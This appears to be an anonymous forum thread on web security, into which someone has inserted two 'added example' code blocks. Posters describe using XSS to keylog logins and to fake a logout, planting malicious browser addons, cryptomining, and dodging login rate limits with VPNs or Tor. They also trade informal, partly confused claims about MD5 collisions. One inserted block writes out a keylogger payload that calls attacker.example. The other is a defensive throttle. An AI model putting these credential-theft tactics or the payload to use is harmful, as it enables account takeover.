
Web Security Thread

Name: Anonymous 2018-05-31 18:51

ITT we discuss web security.

Name: Anonymous 2018-05-31 18:51

I wonder how many web security nerds even know how to do anything with XSS vulns aside from useless shit like alert boxes lol

``it's a proof of concept, use your imagination to figure out the possibilities for post-exploitation''

translation: how do i sploit xss? i dunno lol

Name: Anonymous 2018-05-31 20:50

You should only use cgis written in C.

Name: Anonymous 2018-05-31 21:59

>>3
Why would you mention C in a thread about security?
U MENA RUST?
muh memory safety

That being said, C and cgi are ancient as fuck. It's all about Node now, gramps.

I don't even know what security issues cgi/C stuff has, but it's so old that it's no longer relevant. Regardless of what you think about the current state of modern web development, the fact of the matter is that people are using shit like MEAN, so you need to keep up with current tech trends, even if you insist that older shit is better.

But then again, you were probably just joking and I'm probably just autistic, right?

Name: Super Hell !JM1IoNO1/U 2018-06-01 0:56

>>2
Say you have an XSS. The "best" you can do I think is silently insert a script to keylog a user's input. This is better than stealing cookies, because their logins might be cross-tested on different sites and applications and pass, meaning you can get logins to many different things like social media and even bank accounts, if you get an email and password that they use for everything. (A "master key".)

You can even force them out of the website (they'll think it's a bug) so they have to log in again. You log them off without changing the page, just by manipulating HTML elements, then insert an event listener on the input elements you've created or exposed, in such a way that they think the webpage is behaving normally and some sort of regular fault got them off of the service.
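
An added example, not from the thread or any of its posters: the same untrusted value rendered by a vulnerable template and by a hardened one, plus a check that encoding alone does not cover an unquoted attribute. The payload is a constructed illustration of the keylogger idea in the post above (a script that listens for `input` events and ships the typed value off-site); `attacker.example` is a placeholder host and the `render*` helpers are hypothetical, not any real framework's API.

```javascript
// Constructed payload: what an injected keylogger of the kind described above
// would look like. It never runs here; we only check whether a template lets
// it through as markup.
const KEYLOG_PAYLOAD =
  "<script>document.addEventListener('input', e => " +
  "fetch('https://attacker.example/?k=' + encodeURIComponent(e.target.value)))</script>";

// HTML-encode for a text node or a *quoted* attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Reflected XSS: the search term is interpolated into the page as-is.
function renderSearchVulnerable(query) {
  return `<p>Results for: ${query}</p>`;
}

// Hardened: encode on output, for the context the value lands in.
function renderSearchSafe(query) {
  return `<p>Results for: ${escapeHtml(query)}</p>`;
}

// Encoding is context-dependent. In an unquoted attribute a value with no
// special characters at all can still add an event handler.
function renderInputUnquoted(value) {
  return `<input name="q" value=${escapeHtml(value)}>`;
}
// Quoting the attribute closes that hole: the only way out is a '"', which
// escapeHtml turns into &quot;.
function renderInputQuoted(value) {
  return `<input name="q" value="${escapeHtml(value)}">`;
}

// Crude checks that run without a browser: is there a script element, or an
// on*= handler attribute sitting outside any quoted value?
function hasScriptElement(html) {
  return /<script\b/i.test(html);
}
function hasEventHandlerAttr(html) {
  const stripped = html.replace(/"[^"]*"/g, '""'); // blank out quoted values
  return /\son\w+\s*=/i.test(stripped);
}
```

For DOM-based sinks the equivalent fix is assigning untrusted text via `textContent` rather than `innerHTML`; a Content-Security-Policy without `'unsafe-inline'` is the defence-in-depth layer that stops the injected script from executing even when encoding is missed somewhere.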

Name: Super Hell !JM1IoNO1/U 2018-06-01 1:06

Another alternative to xss is inserting these things in "popular addons" in Firefox Stores and such. These take time to verify, and you always catch something (I assume) before it is completely exposed, more so if your addon does in fact solve a problem or is functional. Just make sure to do the basics of protecting your identity and you can keep trying these and redoing them for literally forever (for some understood definition of literally and forever).

Name: Anonymous 2018-06-01 3:21

>>6
Most normies either use Chrome (desktop and mobile) or Safari (on iOS) though. Firefox is dying slowly but surely.

Name: Super Hell !JM1IoNO1/U 2018-06-01 17:17

>>7
I think chrome desktop supports addons/extensions, so it's basically the same thing. Unless they sandbox it efficiently, or implement it differently.

Name: Anonymous 2018-06-04 7:01

>>2
I don't do security on web (I'm more of a low-level buffer overflowing kinda guy) but if I had an XSS vuln I'd just use it to mine cryptocurrencies, that has the best effort-to-profit ratio

Name: Anonymous 2018-06-04 9:05

>>5
what if instead you show an alert popup that says "haxx0red!!"

Name: Anonymous 2018-06-04 9:08

what if it showed you an alert that checked your dubs?

Name: Anonymous 2018-06-07 17:25

If a site has rate-limiting for login attempts, you can just rotate VPNs or Tor exit nodes to get more attempts. So how would a web developer make their site safe from these kinds of attacks? Getting around rate limiting, that is.

Name: Anonymous 2018-06-07 19:20

Is security impossible?

Name: Anonymous 2018-06-07 19:55

>>12
rate limit based on username

Name: Anonymous 2018-06-08 1:44

>>14
But then you can just lock people out of their accounts by making a bunch of incorrect login attempts. Or is that more desirable than the alternatives?

Name: Anonymous 2018-06-08 2:14

my girlfriend makes out
my phone rings
I answer it yet dad is dead
but who was phone?

Name: Anonymous 2018-06-08 18:55

Anybody here know anything about XML External Entity Processing (XXE)?

I learned JSON instead of XML in uni because XML is older/outdated, but it seems interesting from a security standpoint.

Name: Super Hell !JM1IoNO1/U 2018-06-10 15:43

>>12
Profiling, treating login attempts like spam. It's what google does with their search requests, no bots pass, and sometimes it catches people too.

Alternatively, captchas for each login attempt.
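
An added example, not code from any poster in this thread, putting the last few replies together: a login throttle keyed on both the client IP and the target username. The per-IP budget is only a first filter (an attacker rotating VPN or Tor exit nodes gets a fresh budget each time), and the per-username counter deliberately never hard-locks the account, since that would let anyone lock a victim out by spamming wrong passwords; it escalates to a CAPTCHA instead, which the real owner can still pass. The thresholds, window and the `LoginThrottle` / `simulateAttacker` names are assumptions for illustration.

```javascript
// Hypothetical login throttle (not any real library's API).
class LoginThrottle {
  constructor({ ipLimit = 20, userLimit = 5, windowMs = 15 * 60 * 1000 } = {}) {
    this.ipLimit = ipLimit;      // failures per IP per window before rejecting outright
    this.userLimit = userLimit;  // failures per username per window before demanding a CAPTCHA
    this.windowMs = windowMs;
    this.byIp = new Map();       // ip -> [failure timestamps]
    this.byUser = new Map();     // normalized username -> [failure timestamps]
  }

  // Drop entries older than the window and return the live list (sliding window).
  _recent(map, key, now) {
    const cutoff = now - this.windowMs;
    const list = (map.get(key) || []).filter((t) => t > cutoff);
    map.set(key, list);
    return list;
  }

  static _norm(username) {
    return username.trim().toLowerCase();
  }

  // Called before the password is checked. 'now' is injectable for testing.
  check(username, ip, now = Date.now()) {
    const ipFails = this._recent(this.byIp, ip, now).length;
    const userFails = this._recent(this.byUser, LoginThrottle._norm(username), now).length;
    if (ipFails >= this.ipLimit) return { allow: false, captcha: false, reason: 'ip-limit' };
    // Per-username: step up, never lock out.
    if (userFails >= this.userLimit) return { allow: true, captcha: true, reason: 'user-limit' };
    return { allow: true, captcha: false, reason: 'ok' };
  }

  // Called on a wrong password or a failed CAPTCHA.
  recordFailure(username, ip, now = Date.now()) {
    this._recent(this.byIp, ip, now).push(now);
    this._recent(this.byUser, LoginThrottle._norm(username), now).push(now);
  }

  // A successful login clears the per-username counter (the IP history stays).
  recordSuccess(username) {
    this.byUser.delete(LoginThrottle._norm(username));
  }
}

// Constructed simulation: a bot that always gets the password wrong and
// cannot solve CAPTCHAs, attacking one account; ipFor(i) picks the source IP
// for attempt i, so the same loop models a fixed IP or a rotating one.
function simulateAttacker(throttle, username, attempts, ipFor, start) {
  const out = { passed: 0, captcha: 0, blocked: 0 };
  for (let i = 0; i < attempts; i++) {
    const ip = ipFor(i);
    const d = throttle.check(username, ip, start + i);
    if (!d.allow) { out.blocked++; continue; }
    if (d.captcha) out.captcha++; else out.passed++;
    throttle.recordFailure(username, ip, start + i);   // wrong password / failed CAPTCHA
  }
  return out;
}
```

With the defaults, a bot rotating to a fresh exit node on every attempt is never stopped by the IP limit but is held at a CAPTCHA after five misses against the account, while the account's owner can still log in (with a CAPTCHA) and, on success, resets the counter.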

Name: Anonymous 2018-06-10 16:25

>>18
>and sometimes it catches people too.
I have to fill out extra captchas all the time because I use a VPN
no VPN = no more extra captchas

Name: Anonymous 2018-06-10 18:22

>>17
>I learned JSON instead of XML in uni
Neither JSON nor XML is something that you need to go to uni to learn. You can understand both of them in just 5 minutes.

Name: Anonymous 2018-06-10 19:16

>>20

t. no-degree brainlet

protip: college isn't just about learning programming, it's also about meeting people to work on projects with and network with and all that good stuff

can't do that using www.gaymediocrefreecodeschool.cum

Name: Anonymous 2018-06-10 19:22

>>21
>t. no-degree brainlet
*PhD brainlet

>it's also about meeting people to work on projects with and network
No, it isn't.

Name: Anonymous 2018-06-10 19:26

>>21
data formats aren't programming, dolt

Name: Anonymous 2018-06-10 19:50

>>22
>PhD
Good for you. Still doesn't invalidate what I said.
>No, it isn't.
You're completely wrong on that.

College is useful for meeting people, is it not? To say that you can learn computer science outside of college doesn't mean college isn't worth it. Maybe you're jaded since you're probably drowning in debt from undergrad and a master's and a PhD, but so far my undergrad experience has been great. I've studied abroad and met tons of people and worked on websites and apps with cool people I never would have met otherwise. Can't do that with man pages or YouTube tutorials. Sure, there's Meetup or Craigslist, but they kind of suck by comparison.

>>23
How are data formats not related to programming? Ever made a Node backend? Express and Mongoose and JSON schema and all that. That actually is programming. The way you structure your data affects how you program shit.

Programming is more than just opening an IDE and writing some gay Lisp code. Programming is changing, gramps.

Name: Anonymous 2018-06-10 20:19

>>24
>Good for you. Still doesn't invalidate what I said.
It does actually. You claimed that I have no degree.

>College is useful for meeting people, is it not?
Yes, meeting professors if you want to go to academia afterwards.

>and worked on websites and apps with cool people I never would have met otherwise
IRC, FOSS communities, etc..

Name: Anonymous 2018-06-10 20:36

Welp. Mr PhD over here has a PhD, therefore you can't meet people in college. And meeting people in college isn't important. QED. I've been owned by that flawless logic. Clearly only a highly intelligent person with a PhD could construct an amazing argument like that.

Name: Anonymous 2018-06-10 21:54

>>26
And don't you forget it either!

Name: Anonymous 2018-06-11 1:44

Can I still use md5?

Name: Anonymous 2018-06-11 1:55

>>28
depends
it's fast but insecure
still useful in places where bcrypt or whatever is too computationally intensive

Name: Anonymous 2018-06-11 1:56

>>28
A 2013 attack by Xie Tao, Fanbao Liu, and Dengguo Feng breaks MD5 collision resistance in 2^18 time. This attack runs in less than a second on a regular computer.[2]
MD5 is prone to length extension attacks.
It can still be used as a checksum to verify data integrity, but only against unintentional corruption.

Name: Anonymous 2018-06-11 2:04

>>30
so basically, the good thing about md5 is that it's a quick checksum algorithm -- making sure file transfers didn't fuck up, or things like that -- areas in trust zones where you're not concerned about security because something else handled security beforehand

the bad thing is that it's too quick for security

the large checksum collider

I'm assuming "length extension attacks" means padding a file to get one checksum to be identical to another, due to the pigeonhole principle

Name: Anonymous 2018-06-11 2:20

An NVIDIA GeForce 8800 Ultra can calculate more than 200 million hashes per second.[19]

MD5 uses the Merkle–Damgård construction, so if two prefixes with the same hash can be constructed, a common suffix can be added to both to make the collision more likely to be accepted as valid data by the application using it. Furthermore, current collision-finding techniques allow specifying an arbitrary prefix: an attacker can create two colliding files that both begin with the same content.

The non-linear function has only a 32-bit output, so it's more like four 32-bit hashes chained together

Name: Anonymous 2018-06-11 2:23

>>32
Remember when the Q6600 and 8800GT were /g/'s official hardware recommendations?

I never had an 8800 Ultra, but I did have an 8800GTX.

Damn, I'm getting old. Where did the time go?

Name: Anonymous 2018-06-11 2:43

lol
And, the non-linear function is compressing at 4:1 (5:1 counting the input), so there will be 2^96 colliding input states for a given 32-bit output

you could probably just drop a block of input and it would be secure enough, given it isn't used for anything too sensitive or valuable

Name: Anonymous 2018-06-11 3:28

Wait, no, it's already 3:1, and 2^64. And only using weak non-linear function(s)

Name: Anonymous 2018-06-11 3:39

MAKE MY NON-LINEAR FUNCTION WEAK, DADDY

Name: Anonymous 2018-06-11 6:34

>>31
>I'm assuming "length extension attacks" means padding a file to get one checksum to be identical to another, due to the pigeonhole principle
No, that would be a 'collision'. Length extension is for situations in which someone makes a pseudo-HMAC by concatenating a message with a secret key and hashing that. In theory, you shouldn't be able to modify the message because you wouldn't be able to recalculate the hash, but you actually can find the hash of secret key + message + your message in some specific hashing functions (mostly the ones based on Merkle–Damgård)

here's an explanation: https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks

Name: Anonymous 2018-06-11 9:12

H(b, c, d) = b xor c xor d
I'm pretty sure that's not even nonlinear, and the others are all similarly bit-aligned
And then it does three consecutive additions mod 2^32, which should cancel to one addition?
Finally, a rotation and another addition

Not sure if replacing the block C input with a constant will actually help all that much, but maybe a little

Name: Anonymous 2018-06-11 10:37

Uhhh... can't you just create collisions directly through the mod 2^32 input addition though..?

1 chosen variant round + 3 dummy rounds + 4x 32bit addition attack rounds

Name: Anonymous 2018-06-11 11:15

There's a slight obfuscation in the first attack round, where it adds in the unique B state after a rotation, but the collision gets stored in state B

Then it's just a subtraction for three rounds..?
I don't think that rotate plus addition is going to add too much difficulty
